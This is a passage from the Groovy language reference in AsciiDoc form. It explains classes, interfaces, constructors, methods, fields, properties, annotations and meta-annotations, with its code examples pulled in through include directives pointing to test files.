modifier are automatically public (a special annotation can be used to achieve package private visibility).\n* Fields with no visibility modifier are turned into properties automatically, which results in less verbose code,\nsince explicit getter and setter methods aren't needed. More on this aspect will be covered in the <<fields,fields and properties section>>.\n* Classes do not need to have the same base name as their source file definitions but it is highly recommended in most scenarios (see also the next point about scripts).\n* One source file may contain one or more classes (but if a file contains any code not in a class, it is considered a script). Scripts are just classes with some\nspecial conventions and will have the same name as their source file (so don't include a class definition within a script having the same name as the script source file).\n\nThe following code presents an example class.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_definition,indent=0]\n----\n<1> class beginning, with the name `Person`\n<2> string field and property named `name`\n<3> method definition\n\n\n==== Normal class\n\nNormal classes refer to classes which are top level and concrete. This means they can be instantiated without restrictions from any other classes or scripts. This way, they can only be public (even though the `public` keyword may be suppressed). Classes are instantiated by calling their constructors, using the `new` keyword, as in the following snippet.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_instantiation,indent=0]\n----\n\n\n==== Inner class\n\nInner classes are defined within another classes. The enclosing class can use the inner class as usual. On the other side, a inner class can access members of its enclosing class, even if they are private. Classes other than the enclosing class are not allowed to access inner classes. Here is an example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=inner_class,indent=0]\n----\n<1> the inner class is instantiated and its method gets called\n<2> inner class definition, inside its enclosing class\n<3> even being private, a field of the enclosing class is accessed by the inner class\n\nThere are some reasons for using inner classes:\n\n * They increase encapsulation by hiding the inner class from other classes, which do not need to know about it. This also leads to cleaner packages and workspaces.\n * They provide a good organization, by grouping classes that are used by only one class.\n * They lead to more maintainable codes, since inner classes are near the classes that use them.\n\nIn several cases, inner classes are implementation of interfaces whose methods are needed by the outer class. The code below illustrates this with the usage of threads, which are very common.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=inner_class2,indent=0]\n----\n\nNote that the class `Inner2` is defined only to provide an implementation of the method `run` to class `Outer2`. Anonymous inner classes help to eliminate verbosity in this case.\n\n\n===== Anonymous inner class\n\nThe last example of inner class can be simplified with an anonymous inner class. The same functionality can be achieved with the following code.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=anonymous_inner_class,indent=0]\n----\n<1> comparing with the last example of previous section, the `new Inner2()` was replaced by `new Runnable()` along with all its implementation\n<2> the method `start` is invoked normally\n\nThus, there was no need to define a new class to be used just once.\n\n\n==== Abstract class\n\nAbstract classes represent generic concepts, thus, they cannot be instantiated, being created to be subclassed. Their members include fields\/properties and abstract or concrete methods. Abstract methods do not have implementation, and must be implemented by concrete subclasses.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=abstract_class,indent=0]\n----\n<1> abstract classes must be declared with `abstract` keyword\n<2> abstract methods must also be declared with `abstract` keyword\n\nAbstract classes are commonly compared to interfaces. But there are at least two important differences of choosing one or another. First, while abstract classes may contain fields\/properties and concrete methods, interfaces may contain only abstract methods (method signatures). Moreover, one class can implement several interfaces, whereas it can extend just one class, abstract or not. \n\n=== Interface\n\nAn interface defines a contract that a class needs to conform to. An interface only defines a list of methods that need\nto be implemented, but does not define the methods implementation.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=interface_def_1,indent=0]\n----\n<1> an interface needs to be declared using the `interface` keyword\n<2> an interface only defines method signatures\n\nMethods of an interface are always *public*. It is an error to use `protected` or `private` methods in interfaces:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=protected_forbidden,indent=0]\n----\n<1> Using `protected` is a compile-time error\n\nA class _implements_ an interface if it defines the interface in its `implements` list or if any of its superclasses\ndoes:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_implements,indent=0]\n----\n<1> The `SystemGreeter` declares the `Greeter` interface using the `implements` keyword\n<2> Then implements the required `greet` method\n<3> Any instance of `SystemGreeter` is also an instance of the `Greeter` interface\n\nAn interface can extend another interface:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=extended_interface,indent=0]\n----\n<1> the `ExtendedGreeter` interface extends the `Greeter` interface using the `extends` keyword\n\nIt is worth noting that for a class to be an instance of an interface, it has to be explicit. For example, the following\nclass defines the `greet` method as it is declared in the `Greeter` interface, but does not declare `Greeter` in its\ninterfaces:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=no_structural_interface,indent=0]\n----\n\nIn other words, Groovy does not define structural typing. It is however possible to make an instance of an object\nimplement an interface at runtime, using the `as` coercion operator:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=interface_coercion,indent=0]\n----\n<1> create an instance of `DefaultGreeter` that does not implement the interface\n<2> coerce the instance into a `Greeter` at runtime\n<3> the coerced instance implements the `Greeter` interface\n\nYou can see that there are two distinct objects: one is the source object, a `DefaultGreeter` instance, which does not\nimplement the interface. The other is an instance of `Greeter` that delegates to the coerced object.\n\nTIP: Groovy interfaces do not support default implementation like Java 8 interfaces. If you are looking for something\nsimilar (but not equal), <<_traits,traits>> are close to interfaces, but allow default implementation as well as other\nimportant features described in this manual.\n\n=== Constructors\n\nConstructors are special methods used to initialize an object with a specific state. As with normal methods,\nit is possible for a class to declare more than one constructor, so long as each constructor has a unique\ntype signature. If an object doesn't require any parameters during construction, it may use a _no-arg_ constructor.\nIf no constructors are supplied, an empty no-arg constructor will be provided by the Groovy compiler. For constructors\nwith parameters, Groovy supports two invocation styles: using positional parameters or named parameters.\nThe former style is similar to how you would use Java constructors, while the second way\nallows one to specify parameter names when invoking the constructor.\n\n==== Positional argument constructor\n\nTo create an object by using positional argument constructors, the respective class needs to declare one or more\nconstructors. In the case of multiple constructors, each must have a unique type signature. The constructors can also\nadded to the class using the gapi:groovy.transform.TupleConstructor[] annotation.\n\nTypically, once at least one constructor is declared, the class can only be instantiated by having one of its\nconstructors called. It is worth noting that, in this case, you can't normally create the class with named parameters.\nGroovy does support named parameters so long as the class contains a no-arg constructor or a constructor which takes\na single `Map` argument - see the next section for details.\n\nThere are three forms of using a declared constructor. The first one is the normal Java way, with the `new` keyword.\nThe others rely on coercion of lists into the desired types. In this case, it is possible to coerce with the `as`\nkeyword and by statically typing the variable.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=constructor_positional_parameters,indent=0]\n----\n<1> Constructor declaration\n<2> Constructor invocation, classic Java way\n<3> Constructor usage, using coercion with `as` keyword\n<4> Constructor usage, using coercion in assignment\n\n\n==== Named argument constructor\n\nIf no (or a no-arg) constructor is declared, it is possible to create objects by passing parameters in the form of a\nmap (property\/value pairs). This can be in handy in cases where one wants to allow several combinations of parameters.\nOtherwise, by using traditional positional parameters it would be necessary to declare all possible constructors.\nHaving a constructor taking a single `Map` argument is also supported - such a constructor may also be added using\nthe gapi:groovy.transform.MapConstructor[] annotation.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=constructor_named_parameters,indent=0]\n----\n<1> No constructor declared\n<2> No parameters given in the instantiation\n<3> `name` parameter given in the instantiation\n<4> `age` parameter given in the instantiation\n<5> `name` and `age` parameters given in the instantiation\n\nIt is important to highlight, however, that this approach gives more power to the constructor caller,\nwhile imposing an increased responsibility on the caller to get the names and value types correct.\nThus, if greater control is desired, declaring constructors using positional parameters might be preferred.\n\nNotes:\n\n* While the example above supplied no constructor, you can also supply a no-arg constructor\nor a constructor with a single `Map` argument as previously mentioned.\n* You can support both named and positional construction\nby supply both positional constructors as well as a no-arg or Map constructor.\n* When no (or a no-arg) constructor is declared, Groovy replaces the named constructor call by a call\nto the no-arg constructor followed by calls to the setter for each supplied named property. So, you\nmight be better off using the Map constructor if your properties are declared as `final` (since they\nmust be set in the constructor rather than after the fact with setters).\n\n\n=== Methods\n\nGroovy methods are quite similar to other languages. Some peculiarities will be shown in the next subsections. \n\n==== Method definition\n\nA method is defined with a return type or with the `def` keyword, to make the return type untyped. A method can also receive any number of arguments, which may not have their types explicitly declared. Java modifiers can be used normally, and if no visibility modifier is provided, the method is public.\n\nMethods in Groovy always return some value. If no `return` statement is provided, the value evaluated in the last line executed will be returned. For instance, note that none of the following methods uses the `return` keyword.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=method_definition ,indent=0]\n----\n<1> Method with no return type declared and no parameter\n<2> Method with explicit return type and no parameter\n<3> Method with a parameter with no type defined\n<4> Static method with a String parameter\n\n==== Named arguments\n\nLike constructors, normal methods can also be called with named arguments. They need to receive the parameters as a map. In the method body, the values can be accessed as in normal maps (`map.key`).\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=named_arguments ,indent=0]\n----\n\n==== Default arguments\n\nDefault arguments make parameters optional. If the argument is not supplied, the method assumes a default value.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=default_arguments ,indent=0]\n----\n\nNote that no mandatory parameter can be defined after a default parameter is present, only other default parameters.\n\n==== Varargs\n\nGroovy supports methods with a variable number of arguments. They are defined like this: `def foo(p1, ..., pn, T... args)`.\nHere `foo` supports `n` arguments by default, but also an unspecified number of further arguments exceeding `n`.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_example,indent=0]\n----\n\nThis example defines a method `foo`, that can take any number of arguments, including no arguments at all.\n`args.length` will return the number of arguments given. Groovy allows `T[]` as a alternative notation to `T...`.\nThat means any method with an array as last parameter is seen by Groovy as a method that can take a variable number of arguments.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_array_notation,indent=0]\n----\n\nIf a method with varargs is called with `null` as the vararg parameter, then the argument will be `null` and not an array of length one with `null` as the only element.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_null_parameter,indent=0]\n----\n\nIf a varargs method is called with an array as an argument, then the argument will be that array instead of an array of length one containing the given array as the only element.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_array_parameter,indent=0]\n----\n\nAnother important point are varargs in combination with method overloading. In case of method overloading Groovy will select the most specific method.\nFor example if a method `foo` takes a varargs argument of type `T` and another method `foo` also takes one argument of type `T`, the second method is preferred.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_method_overloading,indent=0]\n----\n\n==== Method selection algorithm\n\n(TBD)\n\n==== Exception declaration\n\nGroovy automatically allows you to treat checked exceptions like unchecked exceptions.\nThis means that you don't need to declare any checked exceptions that a method may throw\nas shown in the following example which can throw a `FileNotFoundException` if the file isn't found:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=idiomatic_method_declaration,indent=0]\n----\n\nNor will you be required to surround the call to the `badRead` method in the previous example within a try\/catch\nblock - though you are free to do so if you wish.\n\nIf you wish to declare any exceptions that your code might throw (checked or otherwise) you are free to do so.\nAdding exceptions won't change how the code is used from any other Groovy code but can be seen as documentation\nfor the human reader of your code. The exceptions will become part of the method declaration in the bytecode,\nso if your code might be called from Java, it might be useful to include them.\nUsing an explicit checked exception declaration is illustrated in the following example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=checked_method_declaration,indent=0]\n----\n\n=== Fields and properties\n\n[[fields]]\n==== Fields\n\nA field is a member of a class or a trait which:\n\n* a mandatory _access modifier_ (`public`, `protected`, or `private`)\n* one or more optional _modifiers_ (`static`, `final`, `synchronized`)\n* an optional _type_\n* a mandatory _name_\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=field_declaration,indent=0]\n----\n<1> a `private` field named `id`, of type `int`\n<2> a `protected` field named `description`, of type `String`\n<3> a `public static final` field named _DEBUG_ of type `boolean`\n\nA field may be initialized directly at declaration:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=field_initialization,indent=0]\n----\n<1> the private field `id` is initialized with `IDGenerator.next()`\n\nIt is possible to omit the type declaration of a field. This is however considered a bad practice and in general it\nis a good idea to use strong typing for fields:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=typing_fields,indent=0]\n----\n<1> the field `mapping` doesn't declare a type\n<2> the field `mapping` has a strong type\n\nThe difference between the two is important if you want to use optional type checking later. It is also important\nfor documentation. However in some cases like scripting or if you want to rely on duck typing it may be interesting\nto omit the type.\n\n[[properties]]\n==== Properties\n\nA property is an externally visible feature of a class. Rather than just using a public field to represent\nsuch features (which provides a more limited abstraction and would restrict refactoring possibilities),\nthe typical convention in Java is to follow JavaBean conventions, i.e. represent the property using a\ncombination of a private backing field and getters\/setters. Groovy follows these same convetions\nbut provides a simpler approach to defining the property. You can define a property with:\n\n* an *absent* access modifier (no `public`, `protected` or `private`)\n* one or more optional _modifiers_ (`static`, `final`, `synchronized`)\n* an optional _type_\n* a mandatory _name_\n\nGroovy will then generate the getters\/setters appropriately. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=properties_definition,indent=0]\n----\n<1> creates a backing `private String name` field, a `getName` and a `setName` method\n<2> creates a backing `private int age` field, a `getAge` and a `setAge` method\n\nIf a property is declared `final`, no setter is generated:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=readonly_property,indent=0]\n----\n<1> defines a read-only property of type `String`\n<2> defines a read-only property of type `int`\n<3> assigns the `name` parameter to the `name` field\n<4> assigns the `age` parameter to the `age` field\n\nProperties are accessed by name and will call the getter or setter transparently, unless the code is in the class\nwhich defines the property:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=property_access,indent=0]\n----\n<1> `this.name` will directly access the field because the property is accessed from within the class that defines it\n<2> similarily a read access is done directly on the `name` field\n<3> write access to the property is done outside of the `Person` class so it will implicitly call `setName`\n<4> read access to the property is done outside of the `Person` class so it will implicitly call `getName`\n<5> this will call the `name` method on `Person` which performs a direct access to the field\n<6> this will call the `wonder` method on `Person` which performs a direct read access to the field\n\nIt is worth noting that this behavior of accessing the backing field directly is done in order to prevent a stack\noverflow when using the property access syntax within a class that defines the property.\n\nIt is possible to list the properties of a class thanks to the meta `properties` field of an instance:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=properties_meta,indent=0]\n----\n\nBy convention, Groovy will recognize properties even if there is no backing field\nprovided there are getters or setters\nthat follow the Java Beans specification. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=pseudo_properties,indent=0]\n----\n<1> writing `p.name` is allowed because there is a pseudo-property `name`\n<2> reading `p.age` is allowed because there is a pseudo-readonly property `age`\n<3> writing `p.groovy` is allowed because there is a pseudo-writeonly property `groovy`\n\nThis syntactic sugar is at the core of many DSLs written in Groovy.\n\n=== Annotation\n\n[[ann-definition]]\n==== Annotation definition\n\nAn annotation is a kind of special interface dedicated at annotating elements of the code. An annotation is a type which\nsuperinterface is the jdk:java.lang.annotation.Annotation[Annotation] interface. Annotations are declared in a very\nsimilar way to interfaces, using the `@interface` keyword:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=define_annotation,indent=0]\n----\n\nAn annotation may define members in the form of methods without bodies and an optional default value. The possible\nmember types are limited to:\n\n* primitive types\n* jdk:java.lang.String[Strings]\n* jdk:java.lang.Class[Classes]\n* an jdk:java.lang.Enum[enumeration]\n* another jdk:java.lang.annotation.Annotation[annotation type]\n* or any array of the above\n\nFor example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_string,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_string_default,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_int,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_class,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_annotation,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_enum,indent=0]\n----\n<1> an annotation defining a `value` member of type `String`\n<2> an annotation defining a `value` member of type `String` with a default value of `something`\n<3> an annotation defining a `step` member of type the primitive type `int`\n<4> an annotation defining a `appliesTo` member of type `Class`\n<5> an annotation defining a `value` member which type is an array of another annotation type\n<6> an annotation defining a `dayOfWeek` member which type is the enumeration type `DayOfWeek`\n\nUnlike in the Java language, in Groovy, an annotation can be used to alter the semantics of the language. It is especially\ntrue of AST transformations which will generate code based on annotations.\n\n[[ann-placement]]\n==== Annotation placement\n\nAn annotation can be applied on various elements of the code:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=apply_annotation_1,indent=0]\n----\n<1> `@SomeAnnotation` applies to the `someMethod` method\n<2> `@SomeAnnotation` applies to the `SomeClass` class\n<3> `@SomeAnnotation` applies to the `var` variable\n\nIn order to limit the scope where an annotation can be applied, it is necessary to declare it on the annotation\ndefinition, using the jdk:java.lang.annotation.Target[Target] annotation. For example, here is how you would\ndeclare that an annotation can be applied to a class or a method:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_target,indent=0]\n----\n<1> the `@Target` annotation is meant to annotate an annotation with a scope.\n<2> `@SomeAnnotation` will therefore only be allowed on `TYPE` or `METHOD`\n\nThe list of possible targets is available in the jdk:java.lang.annotation.ElementType[ElementType enumeration].\n\nWARNING: Groovy does not support the jdk:java.lang.annotation.ElementType#TYPE_PARAMETER[TYPE_PARAMETER] and\njdk:java.lang.annotation.ElementType#TYPE_PARAMETER[TYPE_USE] element types which were introduced in Java 8.\n\n==== Annotation member values\n\nWhen an annotation is used, it is required to set at least all members that do not have a default value. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotation_value_set,indent=0]\n----\n\nHowever it is possible to omit `value=` in the declaration of the value of an annotation if the member `value` is the\nonly one being set:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotation_value_set_option,indent=0]\n----\n<1> we can omit the `statusCode` because it has a default value, but `value` needs to be set\n<2> since `value` is the only mandatory member without a default, we can omit `value=`\n<3> if both `value` and `statusCode` need to be set, it is required to use `value=` for the default `value` member\n\n==== Retention policy\n\nThe visibility of an annotation depends on its retention policy. The retention policy of an annotation is set using\nthe jdk:java.lang.annotation.Retention[Retention] annotation:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_retention,indent=0]\n----\n<1> the `@Retention` annotation annotates the `@SomeAnnotation` annotation\n<2> so `@SomeAnnotation` will have a `SOURCE` retention\n\nThe list of possible retention targets and description is available in the\njdk:java.lang.annotation.RetentionPolicy[RetentionPolicy] enumeration. The\nchoice usually depends on whether you want an annotation to be visible at\ncompile time or runtime.\n\n==== Closure annotation parameters\n\nAn interesting feature of annotations in Groovy is that you can use a closure as an annotation value. Therefore\nannotations may be used with a wide variety of expressions and still have IDE support. For example, imagine a\nframework where you want to execute some methods based on environmental constraints like the JDK version or the OS.\nOne could write the following code:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_example,indent=0]\n----\n\nFor the `@OnlyIf` annotation to accept a `Closure` as an argument, you only have to declare the `value` as a `Class`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_def,indent=0]\n----\n\nTo complete the example, let's write a sample runner that would use that information:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_runner,indent=0]\n----\n<1> create a new instance of the class passed as an argument (the task class)\n<2> emulate an environment which is JDK 6 and not Windows\n<3> iterate on all declared methods of the task class\n<4> if the method is public and takes no-argument\n<5> try to find the `@OnlyIf` annotation\n<6> if it is found get the `value` and create a new `Closure` out of it\n<7> set the `delegate` of the closure to our environment variable\n<8> call the closure, which is the annotation closure. It will return a `boolean`\n<9> if it is `true`, call the method\n<10> if the method is not annotated with `@OnlyIf`, execute the method anyway\n<11> after that, return the task object\n\nThen the runner can be used this way:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_runner_exec,indent=0]\n----\n\n==== Meta-annotations\n\n===== Declaring meta-annotations\n\nMeta-annotations, also known as annotation aliases are annotations that\nare replaced at compile time by other annotations (one meta-annotation\nis an alias for one or more annotations). Meta-annotations can be used to\nreduce the size of code involving multiple annotations.\n\nLet\u2019s start with a simple example. Imagine you have the\u00a0`@Service`\nand\u00a0`@Transactional` annotations and that you want to annotate a class\nwith both:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=transactionalservice_class,indent=0]\n----\n\nGiven the multiplication of annotations that you could add to the same class, a meta-annotation\ncould help by reducing the two annotations with a single one having the very same semantics. For example,\nwe might want to write this instead:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=transactionalservice_class2,indent=0]\n----\n<1> `@TransactionalService` is a meta-annotation\n\nA meta-annotation is declared as a regular annotation but annotated with `@AnnotationCollector` and the\nlist of annotations it is collecting. In our case, the `@TransactionalService` annotation can be written:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=metaann_ts,indent=0]\n----\n<1> annotate the meta-annotation with `@Service`\n<2> annotate the meta-annotation with `@Transactional`\n<3> annotate the meta-annotation with `@AnnotationCollector`\n\n[[meta-ann-behavior]]\n===== Behavior of meta-annotations\n\nGroovy supports both _precompiled_ and _source form_\nmeta-annotations. This means that your meta-annotation\u00a0_may_ be\nprecompiled, or you can have it in the same source tree as the one you\nare currently compiling.\n\nINFO: Meta-annotations are a Groovy-only feature. There is\nno chance for you to annotate a Java class with a meta-annotation and\nhope it will do the same as in Groovy. Likewise, you cannot write a\nmeta-annotation in Java: both the meta-annotation definition\u00a0*and* usage\nhave to be Groovy code. But you can happily collect Java annotations\nand Groovy annotations within your meta-annotation.\n\nWhen the Groovy compiler encounters a class annotated with a\nmeta-annotation, it\u00a0*replaces* it with the collected annotations. So,\nin our previous example, it will\nreplace\u00a0`@TransactionalService` with\u00a0`@Transactional` and\u00a0`@Service`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotations_expanded,indent=0]\n----\n\nThe conversion from a meta-annotation to the collected annotations is performed during the\n_semantic analysis_ compilation phase.\u00a0\n\nIn addition to replacing the alias with the collected annotations, a meta-annotation is capable of\nprocessing them, including arguments.\n\n[[meta-ann-members]]\n===== Meta-annotation parameters\n\nMeta-annotations can collect annotations which have parameters. To illustrate this,\nwe will imagine two annotations, each of them accepting one argument:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collected_ann_explosive,indent=0]\n----\n\nAnd suppose that you want create a meta-annotation named\u00a0`@Explosive`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collected_ann_explosive,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collector_ann_explosive,indent=0]\n----\n\nBy default, when the annotations are replaced, they will get the\nannotation parameter values *as they were defined in the alias*. More interesting,\nthe meta-annotation supports overriding specific values:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=example_bomb,indent=0]\n----\n<1> the `after` value provided as a parameter to\u00a0`@Explosive` overrides the one defined in the `@Timeout` annotation\n\nIf two annotations define the same parameter name, the default processor\nwill copy the annotation value to all annotations that accept this parameter:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collector_ann_same_values,indent=0]\n----\n<1> the `@Foo` annotation defines the `value` member of type `String`\n<2> the `@Bar` annotation also defines the `value` member of type `String`\n<3> the `@FooBar` meta-annotation aggregates `@Foo` and `@Bar`\n<4> class `Bob` is annotated with `@Foo` and `@Bar`\n<5> the value of the `@Foo` annotation on `Bob` is `a`\n<6> while the value of the `@Bar` annotation on `Bob` is `b`\n<7> class `Joe` is annotated with `@FooBar`\n<8> then the value of the `@Foo` annotation on `Joe` is `a`\n<9> and the value of the `@Bar` annotation on `Joe` is also `a`\n\nIn the second case, the meta-annotation value was copied in\nboth `@Foo` and `@Bar` annotations.\n\nWARNING: It is a compile time error if the collected annotations define the same members\nwith incompatible types. For example if on the previous example `@Foo` defined a value of\ntype `String` but `@Bar` defined a value of type `int`.\n\nIt is however possible to customize the behavior of meta-annotations and describe how collected\nannotations are expanded. We'll look at how to do that shortly but first there is an advanced\nprocessing option to cover.\n\n[[handling_duplicate_annotations]]\n===== Handling duplicate annotations\n\nThe `@AnnotationCollector` annotation supports a `mode` parameter which can be used to\nalter how the default processor handles annotation replacement in the presence of\nduplicate annotations.\n\nINFO: Custom processors (discussed next) may or may not support this parameter.\n\nAs an example, suppose you create a meta-annotation containing the `@ToString` annotation\nand then place your meta-annotation on a class that already has an explicit `@ToString`\nannotation. Should this be an error? Should both annotations be applied? Does one take\npriority over the other? There is no correct answer. In some scenarios it might be\nquite appropriate for any of these answers to be correct. So, rather than trying to\npreempt one correct way to handle the duplicate annotation issue, Groovy let's you\nwrite your own custom meta-annotation processors (covered next) and let's you write\nwhatever checking logic you like within AST transforms - which are a frequent target for\naggregating. Having said that, by simply setting the `mode`, a number of commonly\nexpected scenarios are handled automatically for you within any extra coding.\nThe behavior of the `mode` parameter is determined by the `AnnotationCollectorMode`\nenum value chosen and is summarized in the following table.\n\n|================================\n| Mode | Description\n| DUPLICATE | Annotations from the annotation collection will always be inserted. After all transforms have been run, it will be an error if multiple annotations (excluding those with SOURCE retention) exist.\n| PREFER_COLLECTOR | Annotations from the collector will be added and any existing annotations with the same name will be removed.\n| PREFER_COLLECTOR_MERGED | Annotations from the collector will be added and any existing annotations with the same name will be removed but any new parameters found within existing annotations will be merged into the added annotation.\n| PREFER_EXPLICIT | Annotations from the collector will be ignored if any existing annotations with the same name are found.\n| PREFER_EXPLICIT_MERGED | Annotations from the collector will be ignored if any existing annotations with the same name are found but any new parameters on the collector annotation will be added to existing annotations.\n|================================\n\n[[meta-ann-processor]]\n===== Custom annotation processors\n\nA custom annotation processor will let you choose how to expand a\nmeta-annotation into collected annotations. The behaviour of the meta-annotation is,\nin this case, totally up to you. To do this, you must:\n\n* create a meta-annotation processor, extending gapi:org.codehaus.groovy.transform.AnnotationCollectorTransform[AnnotationCollectorTransform]\n* declare the processor to be used in the meta-annotation declaration\n\nTo illustrate this, we are going to explore how the meta-annotation `@CompileDynamic` is implemented.\n\n`@CompileDynamic` is a meta-annotation that expands itself\nto\u00a0`@CompileStatic(TypeCheckingMode.SKIP)`. The problem is that the\ndefault meta annotation processor doesn\u2019t support enums and the\nannotation value `TypeCheckingMode.SKIP` is one.\n\nThe naive implementation here would not work:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_naive,indent=0]\n----\n\nInstead, we will define it like this:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_def_fixed,indent=0]\n----\n\nThe first thing you may notice is that our interface is no longer\nannotated with\u00a0`@CompileStatic`. The reason for this is that we rely on\nthe `processor` parameter instead, that references a class which\nwill\u00a0*generate* the annotation.\n\nHere is how the custom processor is implemented:\n\n[source,groovy]\n.CompileDynamicProcessor.groovy\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_processor,indent=0]\n----\n<1> our custom processor is written in Groovy, and for better compilation performance, we use static compilation\n<2> the custom processor has to extend gapi:org.codehaus.groovy.transform.AnnotationCollectorTransform[AnnotationCollectorTransform]\n<3> create a class node representing the `@CompileStatic` annotation type\n<4> create a class node representing the `TypeCheckingMode` enum type\n<5> `collector` is the `@AnnotationCollector` node found in the meta-annotation. Usually unused.\n<6> `aliasAnnotationUsage` is the meta-annotation being expanded, here it is `@CompileDynamic`\n<7> `aliasAnnotated` is the node being annotated with the meta-annotation\n<8> `sourceUnit` is the `SourceUnit` being compiled\n<9> we create a new annotation node for `@CompileStatic`\n<10> we create an expression equivalent to `TypeCheckingMode.SKIP`\n<11> we add that expression to the annotation node, which is now `@CompileStatic(TypeCheckingMode.SKIP)`\n<12> return the generated annotation\n\nIn the example, the `visit` method is the only method which has to be overridden. It is meant to return a list of\nannotation nodes that will be added to the node annotated with the meta-annotation. In this example, we return a\nsingle one corresponding to `@CompileStatic(TypeCheckingMode.SKIP)`.\n\n=== Inheritance\n\n(TBD)\n\n\n[[generics]]\n=== 